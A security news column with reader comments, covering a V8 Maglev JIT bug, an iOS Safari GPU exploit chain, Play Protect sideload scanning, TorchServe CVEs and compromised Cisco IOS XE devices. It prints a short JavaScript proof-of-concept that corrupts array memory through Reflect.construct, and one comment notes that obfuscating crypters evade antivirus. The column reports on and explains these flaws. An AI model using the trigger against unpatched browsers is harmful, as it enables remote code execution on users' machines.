Google Chrome has done a lot of work on JavaScript performance, pushing the V8 engine to more and more impressive feats. Recently, that optimization has one more piece, the Maglev compiler, which sits between Sparkplug and TurboFan, as a mid-tier optimization step. With a Just In Time (JIT) system, the time saving of code optimization steps has to be carefully weighed against the time costs, and Maglev is another tool in that endless hunt for speed. And with anything this complicated, there’s the occasional flaw found in the system. And of course, because we’re talking about it here, it’s a security vulnerability that results in Remote Code Execution (RCE).
The trick is to use Maglev’s optimization against it. Set up a pair of classes, such that B extends A. Calling new B()
results in an attempt to use the constructor from A. Which works, because the compiler checks to make sure that the constructors match before doing so. There’s another way to call a constructor in JS, something like Reflect.construct(B, [], Array);
. This calls the B constructor, but indicates that the constructor should return an Array object. You may notice, there’s no array in the A class below. Tricking the compiler into using the parent class constructor in this fashion results in the array being uninitialized, and whatever happens to be in memory will set the length of the array.
class A {} var x = Array; class B extends A { constructor() { x = new.target; super(); } } function construct() { var r = Reflect.construct(B, [], x); return r; } //Compile optimize code for (let i = 0; i < 2000; i++) construct(); //----------------------------------------- //Trigger garbage collection to fill the free space of the heap new ArrayBuffer(gcSize); new ArrayBuffer(gcSize); corruptedArr = construct(); // length of corruptedArr is 0, try again... corruptedArr = construct(); // length of corruptedArr takes the pointer of an object, which gives a large value
The trick here is to set up several data structures together so the uninitialized array can be used to corrupt the other objects, giving arbitrary read and write of the compiler heap. Shellcode can be loaded in as other data structures, and a function pointer can be overwritten to jump to the shellcode. RCE from simply running Javascript on a webpage. Thankfully this one was found, reported privately, and finally fixed on August 2nd.
Safari, Too
The Threat Analysis Group from Google did an analysis of an iOS Safari 0-day exploit chain, and it’s got an interesting trick to look at. Safari has added an extra sandbox layer to keep the web renderer engine from interacting with GPU drivers directly. This attack chain contains an extra exploit to make that hop, and it uses Safari Inter-Process Communication (IPC) to do it. The vulnerability is a simple one, a buffer overflow in the GPU process. But the rest of the story is anything but simple.
The rest of the exploit reads like building a ship in a bottle, using the toehold in the rendering process to reach in and set up an exploit in the GPU process. The process is to build an arbitrary read, an arbitrary write, flip bits to turn off security settings, and then use object deserialization to run NSExpression. The full write-up goes through the details in excruciating detail. It’s notable that iOS security has reached the point of hardening that it takes so much effort to turn an RCE into an actual system exploit.
Play Protect Expands
It’s no great secret that the ease of side-loading apps is one of Android’s best and worst features when compared to the iPhone. It’s absolutely the best, because it allows bypassing the Play store, running a de-Googled phone, and easily installing dev builds. But with that power comes great ability to install malware. It makes sense — Google scans apps on the Play Store for malware, so the easy way around that problem is to convince users to install malicious APKs directly. And that leads us to this week’s news, that Google’s Play Store is bringing the ability to review sideload apps upon installation, and warn the user if something seems particularly off.
It sounds very similar to the approach taken by Windows Defender, though hopefully malicious apps won’t be able to hijack the security process to block legitimate installs. One concerning detail is the radio silence about disabling the feature, either globally or on a per-install basis. The feature preview only shows the options to either scan the app, uploading some details to Google, or cancel the install. Hopefully this will work like visiting an insecure site in Chrome, where an extra click or two is enough to proceed anyways.
Where’s the Firewall?
Earlier this month, researchers at Oligo published a system takeover exploit chain in TorchServe. It’s… a legitimate problem for many TorchServe installs, scoring a CVSS 9.9. And arguably, it’s really not a vulnerability at all. It contains a default that isn’t actually default, and a Server-Side Request Forgery (SSRF) that’s not a forgery. And for all the ups and downs, apparently nobody had the thought that a default ALLOW firewall might be a bad idea. *sigh* Let’s dive in.
PyTorch is a Python library for machine learning, and it’s become one of the rising starts of the AI moment we’re still in the midst of. One of the easiest ways to get PyTorch running for multiple users is the TorchServe project, which is put together with a combination of Python and Java, which will be important in a moment. The idea is that you can load a model into the server, and users can run their queries using a simple REST interface. TorchServe actually has three API interfaces, the normal inference API, a metrics API, and the management API, each on a different port.
The management API doesn’t implement any authentication checks, and the documentation does warn about this, stating that “TorchServe only allows localhost access by default”. It turns out that this statement is absolutely true: TorchServe binds that interface to 127.0.0.1
by default. While the Oligo write-up gets that technicality wrong, there is a valid point to be made that some of the example configs set the management interface bind on 0.0.0.0
. Docker is a different animal altogether, by the way. Binding to 127.0.0.1 inside a docker container blocks all traffic from outside the container, so the observation that the official TorchServe docker image uses 0.0.0.0
is a bit silly. So to recap, it’s bad to put insecure configuration in your documentation. The TorchServe project has worked to fix this.
Next, The second vulnerability comes with a CVE! CVE-2023-43654 is an SSRF — a weakness where an attacker can manipulate a remote server into sending HTTP requests to unintended places. And technically, that’s true. A request to the management API can specify where the server should attempt to download a new inference model. There is an allowed_urls
setting that specifies how to filter those requests, and by default it allows any file or HTTP/S request. Could that be used to trigger something unintended on an internal network? Sure. Should the allowed URLs setting default to allowing anything? Probably not. Is this issue on the backend management API actually an SSRF worthy of a CVSS 9.8 CVE? Not even close.
And the last issue, CVE-2022-1471, is a Java deserialization RCE. This one is actually a problem — sort of. The issue is actually in SnakeYAML, and was fixed last year. One of the great disadvantages of using Java is that you have to rebuild the project with manually updated libraries. TorchServe didn’t bother to pull the fix till now. If your TorchServe server loads an untrusted inference models, this vulnerability leads to RCE. Except, loading an inference model executes arbitrary code by design. So it’s yet another technically correct CVE that’s utterly bogus.
Now, don’t take my tone of disdain as a complete dismissal of the findings. As far as I can tell, there really are “tens of thousands of IP addresses” exposing the PyServe administrative interface to the Internet. That really is a problem, and good for researchers at Oligo for putting the problem together clearly. But there’s something notably missing from the write-up or recommendations: Configuring the firewall! Why is anybody running a server with a public IP with a default ALLOW firewall?
Bits and Bytes
Forget the Ides of March, Beware the Cisco. This week we got news that there’s a 0-day vulnerability being exploited in the wild, in IOS XE. That firmware can run on switches, routers, access points, and more. And just a couple days ago, a staggering 40,000+ devices were found to be compromised. If you had the misfortune of running a Cisco IOS XE device, and had the HTTP interface exposed online, or to any untrusted traffic, just assume it’s compromised. Oof.
The Safari exploit seems really familiar. I think I saw this in a HaD post earlier: https://www.youtube.com/watch?v=hDek2cp0dmI
Doesn’t surprise me that google are forcing people to get sideloaded apps scanned, whether they like it or not. Google are forcibly moderating people’s bookmarks and deleting ones they don’t like. They’re are also forcibly training AI on all of your gmail, google docs, google sheets, and everything you upload to google drive, in addition to messages and comments. They’ve become a lot more invasive this year.
This is on top of google’s effort to DRM the entire internet, so that only browsers they bless can access websites. Infrastructure is being implemented in chrome right now to support presenting of a signature that says “this browser will never ever allow the user to block ads or pirate content.” It’s in google’s best interest to as a widespread ad network operator to make websites block access to clients who do’t honour ads.
Not to mention, who defines what’s a “malicious” APK? Google and Google alone. Play Protect has /always/ has the ability to arbitrarily deem an APK as “malicious” and automatically uninstall it without warning or even telling the user afterward… in fact, Google’s used it in the past to ensure certain old apps “stay in the Google Graveyard where they belong” (case in point, trying to sideload old pre-killswitch versions of Play Music requires disabling Play Protect completely, since all version signatures of the GPM APK have been added to GPP’s kill-on-sight list).
As for DRMing the internet, I think Mozilla (or Tor, or someone in that circle of organizations) has already quietly announced the intent to “yeeeaaah, /no/” Google’s plans, whether by lobbying for legislation to shoot the entire premise down at the FCC level, or just plain creating a system to spoof the browser check (it certainly won’t be as easy as lying about the User-Agent string, but no code is hackproof)…
Googles new safer internet. They “mask” your IP by routing your traffic to the website through their proxy servers. So instead of traffic from the website, it goes via google proxies instead. Oh yes, much safer..
AVs don’t do real behavioral analysis.. That’s why FUD crypters still work for mobile and desktop in 2023.. PlayProtect claimed to have A.I. for a while, but a lot of those malicious apps just use obfuscation to get execution.. About 10 years ago a lot AV companies claimed to have a “sandbox” and/or HIPS which were also exposed by malware using simple obfuscation; a lot of time it’s just a new stub doing layers of xor or rc5